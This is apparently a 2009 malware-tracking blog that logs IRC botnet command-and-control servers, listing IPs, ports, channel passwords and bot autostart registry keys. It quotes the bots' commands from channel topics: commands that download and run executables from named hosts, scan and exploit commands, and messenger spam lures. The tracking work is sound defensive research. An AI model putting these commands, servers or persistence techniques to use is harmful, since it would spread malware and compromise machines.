tl6.welovewarez.com DNS_TYPE_A 85.17.141.52
85.17.141.52:6700
Nick: [00|AUT|XP|411848]
Username: SP3-416
Joined Channel: ##!who!## with Password 101#
Channel Topic for Channel ##!who!##: ".sftp welovewarez.com 21 wat l0l1 SCUM.EXE|.asc -S -s|.asc svrsvc_ESP_SP2 100 5 0 148.245.x.x -r -s"
Autostart Path
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network
Windows automatic updates = "C:\WINDOWS\system\iexplorer.exe"
Friday, August 28, 2009
tl6.welovewarez.com ( MS08-067 ) ( ALUCARD )
Posted by Role at 3:37 AM 0 comments
Sunday, August 23, 2009
dddd.burimche.net (burimi)
dddd.burimche.net
87.105.154.165:4244
MODE [00|USA|650342] -ix
JOIN ##bb## bole
NICK [00|USA|650342]
USER XP-0248 * 0 :SSC-19116644F03
PASS letmein
NICK [00|USA|200623]
USER XP-6975 * 0 :COMPUTERNAME
Topic is '.msn.stop|.msn.msg new ha ha http://www.fakiratu.com/image.php?='
Set by C-RDP on Sun Aug 23 20:37:36
Auto Startup Path
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Windows UDP Control Center = "fxstaller.exe"
1033 TCP fxstaller.exe (%Windir%\fxstaller.exe)
1034 TCP fxstaller.exe (%Windir%\fxstaller.exe
Posted by Role at 5:26 AM 0 comments
69.64.50.107
69.64.50.107:6667
NICK COMPUTERNAME778
USER UserName ZM ZM COMPUTERNAME
JOIN #phcrulez
NICK COMPUTERNAME859
Autostart Path
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
WinLogon = "%Windir%\svhosr.exe"
1036 TCP svhosr.exe (%Windir%\svhosr.exe
Posted by Role at 5:15 AM 0 comments
Saturday, August 22, 2009
65.23.159.69 (x)
65.23.159.69:38722
User Name: XP-8703
Real Name: MICHAEL
Password: test
Nick Name: [USA|00|P|39732]
Non RFC Conform: 1
Channel
Name: #test
Password: test
Topic Deleted: :.msn.sendzip OMG is this you? |.aim.msg EW! look at this picture of you I found http://allyepic.com/Picture004.jpg |.triton.msg LOL http://allyepic.com/Picture004.jpg
Autostart path
Key:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: svchosts
Data: svchosts.exe
Key:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
Value: svchosts
Data: svchosts.exe
Firewall
Key:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\Authorized
Applications\List
Value: C:\10239953.exe
Data: C:\10239953.exe:*:Enabled:svchosts
Posted by Role at 6:48 AM 0 comments
Friday, August 21, 2009
irc.tiklabosal.net (aBoLt)
*** IP of : 95.168.175.87 host irc.tiklabosal.net
95.168.175.87:6667
Channels
USERHOST USA|9478145
JOIN #Kr@L PASS: !B
JOIN #M3ist3R
MODE USA|9478145 -x+i
Topic is '#advscan asn 200 5 0 -r -b -n -k -j'
.download http://www.tiklabosal.net/kral.exe c:\kral.exe 1 | aBoLt Siker xD
Autostart Path
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Internet Security Service = "expllorer.exe"
C:\WINDOWS\system32\expllorer.exe
Posted by Role at 11:24 PM 0 comments
sip4.voipkosovasite.com (BURIMI GAY NET IS BACK)
sip4.voipkosovasite.com
82.114.87.46:1868
MODE [00|USA|409999] -ix
JOIN #!a!
MODE [00|USA|409999] -ix
JOIN #!a!
Topic
is
'.msn.stop|.msn.msg all models photo news? :D
http://pisi.freewebhostx.com/photos.php?='
-irc.foonet.com- *** Notice -- l (auth@18076492.BE3D884F.78F63BB0.IP) [bobsmith] is now a network administrator (N)
Autostart path
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Framework module library = "C:\WINDOWS\system32\infocard.exe"
Posted by Role at 12:53 PM 0 comments
Wednesday, August 19, 2009
net.anddos.co.uk (anddos)
net.anddos.co.uk DNS_TYPE_A 94.75.216.31
94.75.216.31:6667
MODE [00|USA|XP|SP3]-3806 -i
JOIN #120 bforce
Nick: [00|AUT|XP|SP3]-2415
Username: xyrbyc
Joined Channel: #120 with Password bforce
Channel Topic for Channel #120: ".find vnc-5900 60 3 0 189.x.x.x"
Private Message to Channel #120: "vnc-5900 for 0 minutes 5 delay 60 threads"
.dl http://94.75.216.31:85/~anddos/120c c:\120c.exe 1
Auto Startup
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
Intranet = "winvs.exe"
Posted by Role at 1:41 AM 0 comments
Thursday, August 13, 2009
bot.sohbetodasi.info (Cod)
*** IP of : 84.201.14.35 host bot.sohbetodasi.info
84.201.14.35:6667
NICK USA|4833514
USER vkqsmeu 0 0 :USA|4833514
USERHOST USA|4833514
MODE USA|4833514 -x+i
JOIN ##scan##
NOTICE USA|4833514 :.VERSION mIRC v6.20 Khaled Mardam-Bey.
NICK USA|4748511
USER wnscqtc 0 0 :USA|4748511
* Topic is '#advscan asn 200 5 0 -r -b -n -k -j'
Set by Cod on Fri Aug 14 04:06:33
.h download http://www.azginkizlar.net/syn.exe c:\syn.exe 1
Ports C:\WINDOWS\system32\msq23.exe
113 TCP msq23.exe (%System%\msq23.exe)
1053 TCP msq23.exe (%System%\msq23.exe)
1054 TCP msq23.exe (%System%\msq23.exe)
1055 TCP msq23.exe (%System%\msq23.exe)
Posted by Role at 10:25 PM 0 comments
Wednesday, August 12, 2009
irc.chatcafe.net
219.90.118.136:6667
User Name: kkcwihso
Host Name: "fo0.net"
Server Name:
Real Name: kkcwihso
Nick Name: raGe|AVMKKecdLc
Channel
# Name: #skynet
# Topic Deleted: :.xpl 93 3 190.x.x.x 2 0
Posted by Role at 11:06 AM 0 comments
94.75.216.31 (Anddos) botnet
94.75.216.31:6667
Nick: [nLh-VNC]ewuowy
Username: qtykph
Joined Channel: #dbot with Password pass
Channel Topic for Channel #dbot: ".h download http://www.sevgideyim.com/resimlerim.exe c:\sdffd.exe 1 "
Private Message to Channel #dbot: "RAGE: file running: 128 KB."
Private Message to Channel #dbot: "Samuray ^C13Anan\xfd sikkkkeeeeRimmmmmm G\xf6t\xfcnden"
channel: #ohai
Password: 0day
Topic Deleted: :.dl http://94.75.216.31:85/~anddos/rap/lsass3.exe c:\lsass3.exe 1
Channel list
#asn2 40
#asn3 1
#dbot 43 fuck off
#asn3b 2 .download http://www.tiklabosal.net/kral.exe c:\kral.exe 1
#dci-test2 1
#asnre 1 .download .download http://www.tiklabosal.net/kral.exe c:\kral.exe 1
#ohai2 21 .dl http://94.75.216.31:85/~anddos/dbot.exe c:\dbot.exe 1
#narod 2 .ver
#test1 30
#imbot4 1
#netapi 5
#dci 14
#asn 1 .download http://www.tiklabosal.net/kral.exe c:\kral.exe 1
#vnc 1
#dci-test 5
#Samuray 1
Posted by Role at 11:02 AM 0 comments
cod.sohbetodasi.info
84.201.14.35:6667
Nick: [N]ktmfudxx
Username: TMR
Joined Channel: ##msn##
Channel Topic for Channel ##msn##: "p umar\xfdm be\xf0enirsin.. al bakal\xfdm"
Posted by Role at 11:01 AM 0 comments
203.86.84.215 (ms08-067) botnet
203.86.84.215:9595
Channel: ##esp, ##rus
Posted by Role at 10:59 AM 0 comments